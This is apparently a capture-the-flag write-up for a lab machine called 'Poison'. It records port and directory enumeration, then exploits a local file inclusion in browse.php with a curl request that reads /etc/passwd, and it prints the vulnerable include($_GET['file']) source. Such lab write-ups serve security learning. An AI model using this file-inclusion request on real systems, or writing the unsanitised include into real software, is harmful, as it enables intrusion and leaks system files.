10.10.10.84 - Poison - LFI (Log Poisoning)

Summary:

vulnerable software : Misconfiguration of PHP/5.6.32, LFI system vulnerable : 10.10.10.84 vulnerability explanation : Local file inclusion in browse.php file. severity : critical

Enumeration:

====================================================================================
RUNNING NMAP TCP PORT ANALYSIS
====================================================================================
[+] Running only TCP port scan
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-02-01 22:05 GMT
Nmap scan report for 10.10.10.84
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: FreeBSD 11.0-RELEASE - 12.0-CURRENT (97%), FreeBSD 11.0-STABLE (95%), FreeBSD 11.0-CURRENT (94%), FreeBSD 11.0-RELEASE (93%), FreeBSD 9.1-STABLE (91%), FreeBSD 12.0-CURRENT (90%), FreeBSD 7.0-RELEASE (90%), FreeBSD 7.0-RELEASE-p2 - 7.1-PRERELEASE (89%), FreeNAS 9.10 (FreeBSD 10.3-STABLE) (89%), Sony Playstation 4 or FreeBSD 10.2-RELEASE (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.29 seconds

Url http://10.10.10.84/browse.php?file=listfiles.php lists few files on the server indicating that *.php and *.txt file extension is in use:

File info.php reveals the OS version, it will come important later on (nmap accurate with OS defection):

FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017 root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64

File phpinfo.php exposing PHP 5.6.32 configuration:

Dangerous allow_url_fopen enabled, possibility of LFI

Directory discovery:

└──╼ $gobuster -u http://10.10.10.84/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50 -x php
=====================================================
Gobuster v2.0.0 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.84/
[+] Threads : 50
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : php
[+] Timeout : 10s
=====================================================
2019/02/01 22:16:44 Starting gobuster
=====================================================
/index.php (Status: 200)
/info.php (Status: 200)
/browse.php (Status: 200)
/phpinfo.php (Status: 200)
=====================================================
2019/02/01 22:23:11 Finished
=====================================================

Vulnerability exploitation:

Since allow_url_fopen was set to on, we could check for LFI vulnerability, in this case an attacker could include a local file /etc/passwd:

└──╼ $curl -k http://10.10.10.84/browse.php?file=/etc/passwd
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh

Local File Inclusion vulnerability can be pushed quite far under right conditions:

LFI -> RCE through PHPinfo.php

LFI -> RCE through Apache Log Poisoning

Source code of vulnerable browse.php file:

www@Poison:/usr/local/www/apache24/data % cat browse.php
<?php
include($_GET['file']);
?>